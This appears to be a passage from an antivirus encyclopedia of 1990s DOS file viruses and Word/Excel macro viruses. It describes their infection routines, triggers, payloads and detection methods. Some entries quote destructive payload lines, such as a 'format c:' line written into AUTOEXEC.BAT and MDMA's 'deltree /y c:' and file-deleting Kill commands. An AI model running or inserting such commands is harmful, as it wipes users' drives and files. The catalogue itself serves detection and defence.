Damage: None
Note: An error message appears when writing because INT 24h has not
been hanged.
Detection method: Infected files increase by 256 bytes.
[Kiwi-550]
Virus Name: Kiwi-550
Virus Type: File Virus (EXE files)
Virus Length: 550-570 bytes
PC vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 550-570 bytes.
[Dennis-2]
Virus Name: Dennis-2
Virus Type: File Virus (COM and EXE files)
Virus Length: 897 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 897 bytes.
[Beer]
Virus Name: Beer
Virus Type: File Virus
Virus Length:
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected file, the virus proceeds to infect it.
Damage: None
Note: This virus has at least three variations.
[2560]
Virus Name: 2560
Virus Type: File Virus (COM and EXE files)
Virus Length: 2560 bytes
PC vectors hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM or EXE file, the virus proceeds to
infect it.
Damage: None
Detection method: Infected files increase by 2560 bytes.
[Atas-3321]
Virus Name: Atas-3321
Virus Type: File Virus (COM files)
Virus Length: 3321 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
The virus can only execute its program on DOS 3.3.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected COM file, the virus proceeds to infect it.
Damage: None
Detection method: Infected files increase by 3321 bytes.
[Ecu]
Virus Name: Ecu
Virus Type: File Virus (EXE files)
Virus Length: 711 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
The virus can only execute its program on DOS 3.3.
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
prevent divulging its trace when writing. If the program to be
executed is an uninfected EXE file, the virus proceeds to infect it.
Damage: Most infected files cannot execute.
Detection method: Infected files increase by 711 bytes.
[N1]
Virus Name: N1
Virus Type: File Virus (COM files)
Virus Length: 10,230-10,240 bytes
Execution Procedure:
The virus searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time). The virus then
displays the following message:
"This File Has Been Infected By NUMBER One!"
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files will display the above message when
executed.
[Arcv-718]
Virus Name: Arcv-718
Virus Type: File Virus (COM and EXE files)
Virus Length: 718 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the high memory.
2) Hooks INT 21h and goes back to the original routine.
3) Checks whether the current date is between 1 and 7, January.
If it is, the virus displays the following message and proceeds to
hang the system:
"Hello Dr Sol & Fido Lurve U lots... "
Infection Procedure:
1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
is an uninfected COM or EXE file, the virus proceeds to infect it.
Damage: Virus will sometimes halt the system.
Detection method: Infected files increase by 718 bytes.
[L-933]
Virus Name: L-933
Virus Type: File Virus (COM files)
Virus Length: 933-950 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
2) Checks the current date.
i) If it is March 8, the virus destroys all data on the hard disk.
ii) If it is September 1, the virus deletes itself.
Damage: Virus will sometimes destroy all data on the hard disk.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 933-950 bytes.
[Alpha743]
Virus Name: Alpha743
Virus Type: File Virus (COM files)
Virus Length: 743 bytes
Execution Procedure:
1) Searches for an uninfected COM file on the current directory,
then infects it (only infects one file at a time).
2) Checks whether the current year is 1993 or later. If current month
is later than February, and current day is 5, the virus displays the
following message:
"Your PC has ALPHA virus.
Brought to you by the ARCV
Made in ENGLAND"
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files increase by 743 bytes.
[Clint]
Virus Name: Clint
Virus Type: File Virus (COM and EXE files)
Virus Length:
Execution Procedure:
1) Searches for an uninfected COM or EXE file on the current directory,
then infects it (infects four files at a time).
2) Displays the following message:
"memory allocation error !"
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) It does not stay resident in the memory.
2) An error message appears when writing because INT 24h has not been
hanged.
Detection method: Infected files display the above message when
executed.
[Love-Child-2710]
Virus Name: Love-Child-2710
Virus Type: File Virus (COM files)
Virus Length: 2710 bytes
PC Vectors Hooked: INT 13h, INT 24h
Execution Procedure:
1) Checks whether the current date is one of the following dates:
November 5, February 22, June 23, August 24, or October 6, or
that the system is not DOS 3.3. If these conditions are met, the
virus destroys the Partition and parts of FAT. If conditions are not
met, the virus checks whether it is memory resident. If not, it
loads itself resident in the high memory.
2) Hooks INT 13h and goes back to original routine.
Infection Procedure:
1) Hooks INT 13H to infect files. First, it hangs INT 24h to prevent
divulging its trace when writing. If the program to be executed is
an uninfected COM file, the virus proceeds to infect it.
Damage: Virus sometimes destroys the Partition and parts of FAT.
Detection method: Infected files increase by 2710 bytes.
[Basedrop]
Virus Name: Basedrop
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure:
1) There is a 25% chance that the virus will do the following:
Search for an uninfected EXE file on the current directory, then
infect it (only infects one file at a time).
2) There is a 25% chance that the virus will do the following:
Carry-out the above procedure. Then, display a message asking the
user to input the following word: "SLOVAKIA." The virus
will wait until the user inputs this word. Virus will then
terminate.
3) There is a 50% chance that the virus program will not infect
files.
Damage: None
[Arianna]
Virus Name: ARIANNA
Virus Type: Multi-partite virus
1. High memory resident file infector. The ARIANNA virus will
only infect .EXE files which are shorter than 70000H bytes in
length and bigger than 1770H bytes in length.
2. Partition sector infector. This virus overwrites the last 9
sectors of the hard drive.
Virus Length: 3426 bytes (EXE files), 3586 (memory)
PC Vectors Hooked: INT 21h
Infection Process: This virus is spread by executing an infected
program or a computer with a partition that has been infected.
When a file infected with the ARIANNA virus is executed, it will
check to see if it is already resident in the memory by checking to
see if the return value of ax is equal to 0 after int
2f(ax=FE01). If the virus is already in the memory it will execute the
infected program. The virus code remains resident in the high memory.
Damage: Decreases available memory. Infected files increase by 3426
bytes.
Symptoms: While the ARIANNA virus is resident in memory you
cannot alter the HD partition to cause any damage to the partition
sector by cleaning it. The way to clean the ARIANNA virus from
the system is to boot up the computer with a clean
system diskette and overwrite the infected partition sector with
the No.9.
[Boza]
Virus Name: Boza
Alias Name: Bizatch
Virus Type: File Virus (EXE files)
Virus Length: 2,680 bytes
Execution Procedure:
When an infected file is executed, the virus
does not install itself into memory. The virus
will infect files which are in Microsoft's Win32
Portable Executable (PE) file format which means
that the virus will only infect Win95 and Win32S
executable files. The virus attempts to infect
up to three files in the current directory;
however, due to some bugs in the program it may
end up corrupting the files it infects.
When the system date reaches the 31st of any month
the virus will display the following message:
"The taste of fame just got tastier!
VLAD Australia does it again with
the world's first Win95 Virus.
From the old school to the new.
Metabolis
Qark
Darkman
Automag
Antigen
RhinceWind
Quantum
Absolute Overload
CoKe"
The virus also contains the following text string:
"Please note: the name of this virus is [Bizatch]
written by Quantum of VLAD"
[Word.Demonstrate]
Virus Name: Word.Demonstrate (Demonstration Macro Virus)
Virus Type: Word macro virus
Virus Length: N/A
Description: This virus infects MS Word documents.
This virus consists of the following macro:
AutoClose
When an infected file is opened, the virus infects the
global template "Normal.dot" by inserting a single
macro.
Once the virus is active, it will infect all new
documents when they are closed.
[Winexcel.DMV]
Virus Name: Winexcel.DMV (Demonstration Macro Virus)
Virus Type: Excel macro virus
Virus Length: N/A
Description: This virus infects MS Excel documents.
This virus consists of the following macros:
AutoClose
When an infected file is closed, the virus adds a
single macro to the global macro file. Subsequent
files which are closed also have the macro attached.
This virus does not work because of a bug in the
program.
[Word.Xenixos]
Virus Name: Word.Xenixos
Alias Name: Nemesis, Xos, Evil One, Xenixos:De
Virus Type: Word macro virus
Virus Length: 31342 Bytes (11 Macros)
Infection: German Microsoft Word documents and templates
Symptoms:Text added to printed documents
Format of C:\ drive
Change of C:\AUTOEXEC.BAT
Display of windows
Description: This virus infects MS Word documents.
Xenixos is the first macro virus that was written especially
for the German version of Microsoft Word. All macro
names are in German, and therefore it only works with the
German Word version. The virus was found in Austria, and
is also posted in Usenet.
The following macros can be found in infected documents
and viewed with the Datei|Dokumentvorlage|Organisieren|Makros command.
"AutoExec"
"AutoOpen"
"DateiBeenden"
"DateiDrucken"
"DateiDruckenStandard"
"DateiOeffnen"
"DateiSpeichern"
"DateiSpeichernUnter"
"Drop"
"Dummy"
"ExtrasMakro"
The infected global template (NORMAL.DOT) includes
the following additional macros:
"AutoClose"
"AutoExit"
"AutoNew"
They all contain the empty macro "Dummy".
Upon opening of an infected document, Xenixos infects
the global template unless the "DateiSpeichernUnter"
macro is already present. Xenixos spreads upon using the
"DateiSpeichern" ("FileSave") and "DateiSpeichernUnter"
("FileSaveAs") command. All its macros are Execute-Only,
and therefore they can not be viewed or modified. Files with
the name "VIRUS.DOT" will not become infected.
During infection, Xenixos checks the system date and then
activates various destructive payloads according to the
date. During the month of May it adds the following
text to "C:\AUTOEXEC.BAT":
" @echo j format c: /u > nul "
This will format the C:\ drive if the DOS "format"
command is present.
During the month of March, Xenixos tries to activate the
DOS-Virus "Neuroquila" by using a DOS DEBUG script.
This part of the virus is faulty (it tries to create an .EXE file)
and therefore the DOS-based virus never infects the system.
The third destructive payload checks the system time,
and in case of a value bigger than 45 in the seconds field,
it will add the password "XENIXOS" to a saved document.
Upon printing a document, Xenixos checks the system
time again, and in case of a value smaller than 30 in the
seconds field, it will add the following text to the end of the
printed document:
" Nemesis Corp. "
Xenixos also includes some additional tricks to make its
detection more difficult. It turns off the prompting of
Word before saving a modified global template and replaces
the Tools|Macros command with a code that will display the
following error message instead of the activation of
Word's built-in macro viewer/editor:
" Diese Option ist derzeit leider nicht verfuegbar "
(This prevents the user from seeing the virus macros).
Upon starting MS Word, Xenixos copies parts of its virus
macros and saves them with new names, (for example:
"DateiSpeichern" -> "DateiSpeichernBak").
After a document is opened, Xenixos restores its backups.
The following text is also found in the virus code, yet is
never displayed:
" Brought to you by the Nemesis Corporation (c) 1996 "
In addition, Xenixos changes section "Compatibility"
inside the WIN.INI file. It sets the variable "RR2CD"
to the value "0x0020401", and the variable "Diag$" to
"0". The WIN.INI variables can be used to deactivate
the virus. Setting the variable "Diag$" to "1" will
prevent most of the destructive payloads.
Some replicants of Xenixos will also display the following
Wordbasic error message:
" Falscher Parameter "
[Word.Wieder]
Virus Name: Word.Wieder
Alias Name: Wieder, Pferd
Virus Type: Word macro virus
Virus Length: 638 Bytes (2 Macros)
Symptoms: C:\Autoexec.bat is moved and deleted
Place of origin: Germany
Description: This virus infects MS Word documents.
Wieder is a not a virus but a trojan horse, since it does
not infect other files.
The following unencrypted macros can be found inside
infected documents:
"AutoClose"
"AutoOpen"
When opening an infected document, Wieder creates
the directory "C:\TROJA", and moves the system file
"C:\AUTOEXEC.BAT" into the newly created directory.
After moving the file the original files are deleted.
When closing an infected document, the following text
is displayed:
"Auf Wieder÷ffnen"
"P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei"
"gerne wiederhaben moechten, sollten Sie einen"
"Blick in das neue Verzeichnis C:\TROJA werfen..."
Any Word 2.0 documents which include the trojan,
includes the following text:
"Trojanisches Pferd "
"Wenn Sie diese Zeilen lesen, wurde bereits Ihre
AUTOEXEC.BAT- Datei aus dem"
"Hauptverzeichnis C:\ entfernt. Hoffentlich haben Sie
eine Kopie davon ? "
"Genauso einfach waere es gewesen, Ihre Festplatte
zu loeschen und mit ein "
"klein wenig mehr Aufwand koennte man auch einen Virus
installieren. "
(c) Stefan Kurtzhals
[Word.Wazzu]
Virus Name: Word.Wazzu
Alias Name: WM.Wazzu
Virus Type: Word macro virus
Virus Length: 632 Bytes (1 Macro)
Symptoms: Words in the active document are erased
The word 'wazzu' is inserted
Place of origin: Washington, United States
Description: This virus infects MS Word documents.
Wazzu.A has only one unencrypted macro which has
a size of 632 Bytes, (starting letter is not capitalized).
"autoopen"
When an infected document is opened, Wazzu.A checks
the name of the active document. If it is
"NORMAL.DOT", then the virus macro is copied from the
global template (NORMAL.DOT) to the open document.
Otherwise, NORMAL.DOT becomes infected. Upon infection, documents
are changed into templates which is very common for macro viruses.
Wazzu does not bypass the prompting from Microsoft
Word before saving the NORMAL.DOT file. Also
Wazzu.A does not check if a document is already
infected. It simply overwrites the "autoopen" macro.
Wazzu has a destructive payload. It picks a random
number between 0 and 1, and if the number is smaller
than 0.2 (probability of 20 percent), the virus will
move a word from one place in the document to
another. This is repeated three times. So the probability
for a Word to be moved is 48.8 percent. After the third
time, Wazzu picks a final random number (between 0 and 1)
and if the value is higher than 0.25 (probability of 25
percent), the word Wazzu will be inserted into the document.
After an infected documents is cleaned, it has to be
checked really careful because chances of having a
modified document (words swapped or added) are
over 61 percent. This can be a very time consuming
job with large documents.
Wazzu is a nickname for the Washington State University.
Since Wazzu.A uses the "autoopen" macro, it also
works with other versions of Microsoft Word, such as
the German version.
(c) Stefan Kurtzhals
[Word.Reflex]
Virus Name: Word.Reflex
Alias Name: RedDwarf
Virus Type: Word macro virus
Virus Length: 897 Bytes in .doc files and 1226
Bytes in .dot files (3 or 4 Macros)
Symptoms: Display of Windows
Place of origin: Ireland
Description: This virus infects MS Word documents.
Delete virus macros from infected documents
(AutoOpen, FClose, FileClose, FA)
Reflex contains 3 encrypted macros (Execute-Only) with
a size of 897 Bytes.
"AutoOpen"
"FClose"
"FileCLose"
An infected global template contains one more macro
("FA"). Upon infection, Reflex turns off the prompting of
Word to ensure a hidden infection of the global template
(NORMAL.DOT). Infected documents are saved with the
password "Guardian." They are also converted internally
to templates, which is very common for macro viruses.
Reflex was written at an antivirus conference after an
Anti-Virus company announced a challenge to hackers
to break its new technology. Any author of a new
undetected macro virus was supposed to receive
champagne as a reward.
When Reflex infects a file it displays the following window:
"Now, Where's that Jerbil of Bubbly? "
Some replicants of Reflex will also display the following
Wordbasic error message:
"Document not open"
[Word.Polite]
Virus Name: Word.Polite
Alias Name: WW2Demo
Virus Type: Word macro virus
Virus Length: 1918 Bytes (2 Macros)
Symptoms: Display of text windows
Place of origin: United States
Description: This virus infects MS Word documents.
Polite was first created with Microsoft version 2.0, yet
also works with higher versions because newer releases
of Word are compatible with older versions.
Polite consists of two unencrypted macros with a size
of 1918 Bytes.
"FileClose"
"FileSaveAs"
Polite can be called a demonstration virus and is very
unlikely to spread. Before each attempted infection,
it displays a window with the following question:
" Shall I infect the file ? "
If the user answers with the "No" button, no documents
gets infected. While it asks for permission to infect
files, it does not ask for permission to infect the global
template (NORMAL.DOT).
Upon infection of the global template or when an infected
document is closed, Polite will display the following
message:
"I am alive! "
Once Polite infects a Word 6.0/7.0 document it can not
infect Word 2.0 documents anymore.
The global template (NORMAL.DOT) becomes infected
when an infected document is closed (only when there is
no FileClose macro). Documents become infected upon
using the "FileSaveAs" command. Polite does not use any
Auto-macros and therefore cannot be blocked by the
/m parameter.
Polite does not work with foreign versions of Microsoft
Word, since it uses the English macro names "FileSaveAs"
and "FileClose".
(c) Stefan Kurtzhals
[Word.Pheeew]
Virus Name: Word.Pheeew
Alias Name: Dutch, NietGoed, Pheeew:NL
Virus Type: Word macro virus
Virus Length: 2759 Bytes (4 Macros)
Symptoms: Display of text,
Deletes files in C:\ and C:\DOS
Place of origin: Unknown
Description: This virus infects MS Word documents.
Pheeew is the first Dutch macro virus, which is strongly
based on the Concept macro virus. Pheeew also has 4
unencrypted macros:
"AutoOpen"
"IkWordNietGoed1"
"IkWordNietGoed2"
"Lading"
When an infected document is opened, Pheeew checks
for a previous infection of the global template
(NORMAL.DOT). Pheeew does this by looking for the
two names of the macros "Lading" and "BestandOpslaanAls".
When NORMAL.DOT is not infected, Pheeew copies its
virus macros into the global template. The macro
"IkWordNietGoed2" is saved under the name
"BestandOpslaanAls" ("FileSaveAs").
Documents are infected when the "FileSaveAs" command
is used. Documents are also changed into templates which
is very common for macro viruses. After infection the
virus shows various windows with the following text:
Window "Important":
" Gotcha ! "
Window "FINAL WARNING!":
"STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
Upon clicking the "No" button on the last window, a destructive
payload is activated. All files in the "C:\" and "C:\DOS" are
deleted (certain file attributes are bypassed).
Pheeew also contains the following texts:
"Done by the Catman "
Macro "Lading":
" Sub MAIN "
" REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC "
" REM *** WARNING *** "
" REM You're computer could be killed right now! "
" REM Thank to you and me it's still ok! "
" REM Next time will be worse! "
" REM *** PHEEEW! *** "
" REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC "
" End Sub "
Pheeew does not work with versions other than the Dutch version
of Microsoft Word.
(c) Stefan Kurtzhals
[Word.PCW]
Virus Name: Word.PCW
Alias Name: Birthday, B-Day, Suzanne
Virus Type: Word macro virus
Virus Length: 1039 Bytes (2 Macros)
Symptoms: Display of message
Place of origin: German computer magazine
Description: This virus infects MS Word documents.
PCW contains two encrypted (Execute-Only) macros
with a size of 1039 Bytes.
"AutoOpen"
"DateiSpeichernUnter"
The name was selected because its code was published
in the German magazine "PC Welt". We expect to see
other variants of this virus, since the code was available
to the public.
Upon opening an infected document, PCW will infect
the global template (NORMAL.DOT). Further
documents are infected when the "DateiSpeichernUnter"
command is used. Infected documents are internally
converted into templates, which is very common for
macro viruses. PCW is also known under the name
"Birthday", since it displays the following window:
" Happy Birthday! Herzlichen Glⁿckwunsch... "
PCW uses German macro names and will therefore only
work with the German version of Microsoft Word.
[Word.Nuclear]
Virus Name: Word.Nuclear
Alias Name: Alert
Virus Type: Word macro virus
Virus Length: 10556 Bytes (9 Macros)
Symptoms: Text added to printed documents
System files deleted on April 5th
Place of origin: Australia
Description: This virus infects MS Word documents.
Nuclear was the second macro virus found "In-the-Wild"
(after Concept). It was distributed over the Internet in
a document with information about the Concept virus.
It was also the first macro virus that used Execute-Only
(encrypted) macros to make analysis more difficult.
Nuclear has 9 macros with a size of 10556 Bytes.
"AutoExec"
"AutoOpen"
"DropSuriv"
"FileExit"
"FilePrint"
"FilePrintDefault"
"FileSaveAs"
"InsertPayload"
"Payload"
Nuclear is activated with the "AutoExec" and "AutoOpen"
macros. Before it infects the global template
(NORMAL.DOT), it checks for a previous infection. It
does not infect if it finds the "AutoExec" macro.
After the virus macros have been transferred to the
global template, Nuclear can call some destructive
payloads. In the first it will try and drop the "Ph33r"
virus. Between 17:00 and 17:59 it creates a text file,
including a script of the DOS/Windows-EXE virus
"Ph33r". It then uses the DOS command "DEBUG.EXE"
to convert the file into an executable file. It also creates the
"EXEC_PH.BAT" batch file, and calls it via the Dos shell.
This last infection routine is faulty, the DOS-window is
closed immediately and the "Ph33r" virus never infects
the system.
In the second, upon printing a document, Nuclear checks
the system time and in case of a value bigger than 55
in the Seconds field, it will add the following text at
the end of the printed document:
"And finally I would like to say: "
"STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC
The third destructive payload is activated on April 5th,
when Nuclear deletes the system files "C:\IO.SYS",
"C:\MSDOS.SYS" and "C:\COMMAND.COM.
Upon closing a file, Nuclear.A turns off the prompting
of Word to ensure a hidden infection of the global
template (NORMAL.DOT). This protective function
of Word is therefore ineffective against Nuclear.
Nuclear infects documents when they are saved with
the "FileSaveAs" function, whereby all infected documents
are internally converted into templates. In addition Nuclear
does not check documents for a previous infection, it simply
overwrites existing macros.
Since Nuclear uses English macro names, such as
"FileSaveAs", it does not work with foreign versions of
Microsoft Word, such as the German version.
(c) Stefan Kurtzhals
[Word.NOP]
Virus Name: Word.NOP
Alias Name: Nop.A:De
Virus Type: Word macro virus
Virus Length: 246 Bytes (2 Macros)
Symptoms: No destructive symptoms
Place of origin: Germany
Description: This virus infects MS Word documents.
NOP is the smallest known macro virus having a size of
only 246 Bytes. Infected documents contain the following
two macros:
"AutoOpen"
"NOP"
NOP is very primitive and has only very few necessary
commands to replicate. Both of its two macros are not
encrypted. The only special characteristic is that it turns
off the prompting of Word before saving the global template
(NORMAL.DOT).
When an infected document is opened, the virus transfers
itself to the global template and renames "NOP" into
"DateiSpeichernUnter" ("FileSaveAs").
Additional documents become infected when they are
saved. Upon infection documents are also converted to
templates which is very common for macro viruses.
NOP.A does not have a destructive payload, mistake
checking, or recognition of already infected documents.
Virus macros of already infected documents are simply
overwritten. NOP.A uses the macro name "DateiSpeichern"
("FileSave"), and works therefore only with the German version
of Microsoft Word.
(c) Stefan Kurtzhals
[Word.NF]
Virus Name: Word.NF
Alias Name: Names, NF:De
Virus Type: Word macro virus
Virus Length: 4209 Bytes (6 Macros)
Symptoms: Display of Windows
Place of origin: United States
Description: This virus infects MS Word documents.
NF contains 2 encrypted macros (Execute-Only) with
a size of 286 Bytes.
"AutoClose"
"NF"
When an infected document is opened, NF will infect
the global template (NORMAL.DOT). Further documents are
infected when they are closed. Infected documents are converted
internally to templates which is very common for macro viruses.
Upon infection, NF will display the following message at the bottom
of the screen:
"Traced!"
NF is one of the very few non-destructive macro viruses.
[Word.MDMA]
Virus Name: Word.MDMA
Alias Name: StickyKeys, MDMA-DMV
Virus Type: Word macro virus
Virus Length: 1635 Bytes (1 Macro)
Symptoms: Files are deleted
Place of origin: United States
Description: This virus infects MS Word documents.
MDMA is the first macro virus that will work on
Windows, Windows 95, Macintosh and Windows NT.
It can be a very destructive macro virus, and Word users
are strongly advised to check their system with an
up-to-date anti-virus program.
MDMA contains only one macro with a size of 1635 Bytes.
"AutoClose"
When an infected document is opened and then closed,
MDMA infects the global template (NORMAL.DOT).
Further documents are infected when they are closed ("AutoClose").
Infected documents are also converted to templates which is very
common for macro viruses.
If an infected document is loaded on the first of each month,
MDMA activates its destructive payloads. The following payloads
will be executed depending on the operating system:
Windows:
--------
Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat
This will delete all the directories on the C:\ drive.
Windows NT:
-----------
Kill "*.*"; Kill "c:\shmk."
This will delete all the files on the C:\ drive
Macintosh:
----------
Kill MacID$("****")
This will delete all files on the hard drive.
Windows 95:
-----------
Kill "c" \shmk."; Kill "c:\windows\*.hlp";
Kill "c:\windows\system\*.cpl"
SetPrivateProfileString ("HKEY_CURRENT_USER\Control
Panel\Accessibility\Stickykeys", "On", "1", "")
SetPrivateProfileString
("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","")
SetPrivateProfileString ("HKEY_CURRENT_USER\Control
Panel\Accessibility\HighContrst", "On", "1", "")
MDMA will also display the following window:
" You are infected with MDMA_DMV. Brought to you
by MDMA (Many Delinquent "
" Modern Anarchists)."
To combat destructive macro viruses, such as MDMA, we advise users
to use an up-to-date anti-virus program.
Microsoft has also released a new Microsoft Word version,
which will warn each time a suspicious macro is loaded.
Users can then decide if they want to disable the macro.
The Microsoft Word upgrade is available for a small fee from Microsoft.
[Word.Maddog]
Virus Name: Word.Maddog
Virus Type: Word macro virus
Virus Length: 4209 Bytes (6 Macros)
Symptoms: Documents contain the text string "MadDog"
Place of origin: Georgia, United States
Description: This virus infects MS Word documents.
Maddog contains 6 macros with a size of 4209 Bytes.
"AutoOpen"
"AutoClose"
"AutoExec"
"FileClose"
"FcFinish"
"AopnFinish"
When an infected document is opened, MadDog will infect the global
template (NORMAL.DOT). Further documents are infected when they are
close with the "FileClose" command. Upon closing a document, MadDog
saves various times to "Temp1" and then saves the active document.
Infected documents are converted internally into templates, which is
very common for macro viruses.
Infected documents contain the text string "MadDog".
[Word.Tele]
Virus Name: Word.Tele
Alias Name: LBYNJ:De, Telefonica, Tele, TEC, Tele-Sex
Virus Type: Word macro virus
Virus Length: 22256 Bytes (7 Macros)
Symptoms: Infection with the Kampana.3784 DOS based virus,
Text added to printed documents
Place of origin: Germany
Description: This virus infects MS Word documents.
LBYNJ is another German macro virus, which is probably based on
the previous macro viruses, such as Xenixos. The 7 encrypted
(Execute-Only) macros of LBYNJ have a size of 22256 Bytes.
"AutoExec"
"AutoOpen"
"DateiBeenden"
"DateiDrucken"
"DateiNeu"
"DateiOeffnen"
"Telefonica"
The macro "AutoExec" includes the infection routine
for the global template (NORMAL.DOT), which will not
get infected when inside the WIN.INI file. In entry
"Compatibility", the string "0x0030303" is set to "LBYNJ".
"AutoExec" also calls the destructive payload in the
"Telefonica" macro. "AutoOpen" starts the "AutoExec"
macro, which means the NORMAL.DOT will become
infected when an infected document is opened. LBYNJ
uses the "Telefonica" macro to check for a previous
infection. It will not infect the global template if the macro
is already present.
Documents are infected upon "DateiBeenden"
("FileClose"), "DateiNeu" ("FileNew") and "DateiOeffnen"
("FileOpen"), whereby at the end of "DateiOeffnen"
("FileOpen") the macro "Telefonica" is called again.
Infected documents are changed to templates, which
is very common for macro viruses.
LBYNJ has two destructive payloads. The first can be
found in the "DateiDrucken" (FilePrint) macro. Upon
printing a document, LBYNJ checks the system time
and in case of a value less than 10 in the seconds field,
it will add the following text at the end of the printed document:
" Lucifer by Nightmare Joker (1996) "
The second payload is activated from the "Telefonica"
macro when the second field has a value of 0 or 1.
("Telefonica" is called from "AutoOpen", "AutoExec"
and "DateiOeffnen"). LBYNJ creates a Debug script (filename:
TELEFONI.SCR) inside the "C:\DOS" directory which includes the DOS
based virus "Kampana.3784".
After creating the script file, LBYNJ executes the
"TELEFONI.BAT" batch file which will use the DOS command
"DEBUG.EXE" to convert the script file into an executable
DOS-based virus and then start it.
(c) Stefan Kurtzhals
[Word.Irish]
Virus Name: Word.Irish
Virus Type: Word macro virus
Virus Length: 4152 Bytes (4 Macros)
Symptoms: Display of windows
Place of origin: USA
Description: This virus infects MS Word documents.
Irish contains 4 macros with a size of 4152 Bytes.
"AutoOpen"
"WordHelp"
"AntiVirus"
"WordHelpNT"
Upon opening an infected document, Irish will infect the
global template (NORMAL.DOT). An infected global
template contains the "FileSave" macro, instead of
"AutoOpen". Further documents are infected when the
"FileSave" command is used. Infected documents are
converted internally to templates which is very common
for macro viruses.
Two of the macros, "WordHelp" and "WordHelpNT",
do not run automatically. However, when executed
manually by the user, they will change the Windows
desktop color to green.
The macro "WordHelpNT" contains a payload which
attempts to activate the screen saver and display the
following message:
"Happy Saint Patties Day "
However, the payload seems to be faulty and does not
work under Windows 95 (Irish only exists in Microsoft Word).
[Word.DMV]
Virus Name: Word.DMV
Alias Name: Impost, Imposter.A, Imposter
Virus Type: Word macro virus
Virus Length: 907 Bytes (2 Macros)
Symptoms: Display of text windows: "DMV"
Place of origin: England
Description: This virus infects MS Word documents.
DMV is based on the Concept virus, with only 2 unencrypted macros.
"FileClose"
"DMV" (FileSaveAs in NORMAL.DOT)
The global template (NORMAL.DOT) becomes infected
when an infected document is closed and the macros
"DMV" and "FileSaveAs" are not present. When Imposter.A copies the
"DMV" macro, it renames it to "FileSaveAs" and displays the
following window:
"DMV"
Further documents are infected when the "FileSaveAs"
command is used. Imposter also changes the new
infected document to a template, which is very common
for macro viruses. The following text can be found inside
DMV, but is not displayed:
" just to prove another point "
(This text is based on the Concept virus, which has "this
is enough to prove my point" in its code).
Because of the use of English macro names, the DMV
virus does not work with Non-English versions such as the
German version of Microsoft Word.
(c) Stefan Kurtzhals
[Word.Hot]
Virus Name: Word.Hot
Alias Name: WM.Hot
Virus Type: Word macro virus
Virus Length: 5515 Bytes (4 Macros)
Symptoms: Text inside documents is deleted
Place of origin: Unknown
Description: This virus infects MS Word documents.
Hot is a complex virus with 4 encrypted viruses. When
an infected document is opened the virus is activated
by the AutoOpen macro. Some replicated Hot samples
also display the following error message:
"Unable to load the specified library"
First, Hot turns off the prompting of Word to ensure a
hidden infection of the global template (NORMAL.DOT).
It also checks the file "WINWORD6.INI" for the following
entry: "QLHot". If it does not exist, Hot will record a
"hot date", 14 days in the future. If this variable is not
already set, the global template becomes infected.
The InsertPBreak/InsertPageBreak macro does, as its name
suggest, will insert a page-break in the current document.
However, it is also used by the virus to recognize if a
document is already infected.
Some of the macros are renamed when they are copied
by the WordBasic "MacroCopy" command:
"AutoOpen" becomes "StartOfDoc"
"DrawBringInFrOut" becomes "AutoOpen"
"InsertPBreak" becomes "InsertPageBreak"
"ToolsRepaginat" becomes "FileSave"
In addition, the global template contains the following macros:
"FileSave" (similar to "ToolsRepaginat")
"StartOfDoc" (similar to "AutoOpen")
Hot also uses special functions from the Windows file
"KERNEL.EXE" (Win API). It uses the API to find the
path to Windows and to open files which provide simple functions.
It should be noted that many other options were available to the
virus author.
The destructive payload, which is activated upon arrival
of the "hot date" set under the "QLHot" section in the
WINWORD6.ini file, deletes text from the current active
document. This payload is bypassed if the file EGA5.CPI
